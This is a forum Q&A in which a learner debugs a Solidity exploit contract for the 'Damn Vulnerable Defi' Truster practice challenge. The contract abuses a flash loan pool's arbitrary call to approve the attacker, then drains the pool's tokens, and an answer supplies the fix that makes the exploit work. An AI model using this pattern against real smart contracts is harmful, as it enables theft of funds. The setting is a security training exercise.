# 'Address: low-level call failed'

Tags: addresses, abi.encodewithsignature

I'm practicing 'Damn Vulnerable Defi #3.Truster'. I created `Attacker` contract and tested `truster.challenge.js`. But I got an 'Address: low-level call failed' error. Is this error related to functionCall? I also found answer about #3.Truster but there's no difference with my code. What should I do?

```
  1) [Challenge] Truster
       Exploit:
     Error: VM Exception while processing transaction: reverted with reason string 'Address: low-level call failed'
      at TrusterLenderPool.verifyCallResult (@openzeppelin/contracts/utils/Address.sol:212)
      at TrusterLenderPool.functionCallWithValue (@openzeppelin/contracts/utils/Address.sol:132)
      at TrusterLenderPool.functionCall (@openzeppelin/contracts/utils/Address.sol:94)
      at TrusterLenderPool.functionCall (@openzeppelin/contracts/utils/Address.sol:80)
      at TrusterLenderPool.flashLoan (contracts/truster/TrusterLenderPool.sol:36)
      at Attacker.attack (contracts/attacker-contracts/Attacker.sol:16)
      at processTicksAndRejections (internal/process/task_queues.js:95:5)
      at runNextTicks (internal/process/task_queues.js:64:3)
      at listOnTimeout (internal/timers.js:526:9)
      at processTimers (internal/timers.js:500:7)
      at HardhatNode._mineBlockWithPendingTxs (node_modules/hardhat/src/internal/hardhat-network/provider/node.ts:1582:23)
      at HardhatNode.mineBlock (node_modules/hardhat/src/internal/hardhat-network/provider/node.ts:435:16)
      at EthModule._sendTransactionAndReturnHash (node_modules/hardhat/src/internal/hardhat-network/provider/modules/eth.ts:1494:18)
```

Attacker.sol

```js
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "../truster/TrusterLenderPool.sol";

contract Attacker{
    function attack(address _pool, address _token) public{
        TrusterLenderPool pool = TrusterLenderPool(_pool);
        IERC20 token = IERC20(_token);

        bytes memory data = abi.encodeWithSignature(
            "approve(address, uint256)", address(this), type(uint256).max
        );

        pool.flashLoan(0, msg.sender, _token, data);

        token.transferFrom(_pool, msg.sender, token.balanceOf(_pool));
    }
}
```

truster.challenge.js

```js
  it("Exploit", async function () {
    const attackContract = await ethers.getContractFactory(
      "Attacker",
      attacker
    );
    const attack = await attackContract.deploy();
    await attack.attack(this.pool.address, this.token.address);
  });
```

Answer (score 1):

your issue is with the space between parameters in "approve(address, uint256)".

Instead of ...

bytes memory data = abi.encodeWithSignature(
"approve(address, uint256)", address(this), type(uint256).max
);

Try ...

bytes memory data = abi.encodeWithSignature(
"approve(address,uint256)", address(this), type(uint256).max
);

Answer (score 0):

I tried to deploy your contract on remix to play with it and debug it, but I got this error:

```
Error: not found truster/TrusterLenderPool.sol
```

Maybe you could provide your full code?

The first thing I would check for your error would be the gas limit of the transaction.

Second would be how you're deploying the contract